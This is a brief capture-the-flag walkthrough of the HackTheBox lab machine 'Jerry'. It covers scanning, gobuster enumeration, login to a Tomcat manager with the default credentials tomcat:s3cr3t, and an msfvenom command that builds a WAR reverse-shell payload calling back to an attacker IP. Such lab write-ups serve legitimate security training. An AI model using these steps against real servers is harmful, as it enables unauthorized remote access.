Ping
Nmap Scans
mapit 10.10.10.95
Nmap Default Scan
Nmap Script and Service Scan
Nmap All port Scan
On port 8080
Gobuster Scan
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt
On http://10.10.10.95:8080/manager/
It will prompt for password, found default creds for tomcat server tomcat:s3cr3t
In hacktricks page about tomcat enumeration: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat
WAR file upload filed
Will generate a war file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.9 LPORT=443 -f war -o shell.war
Will upload and deploy it
We can see the shell file, will just click it before that set up a Netcat listener
Got reverse shell
We are nt authority, so no need Privilege Escalation
Flags
Done with Jerry…:)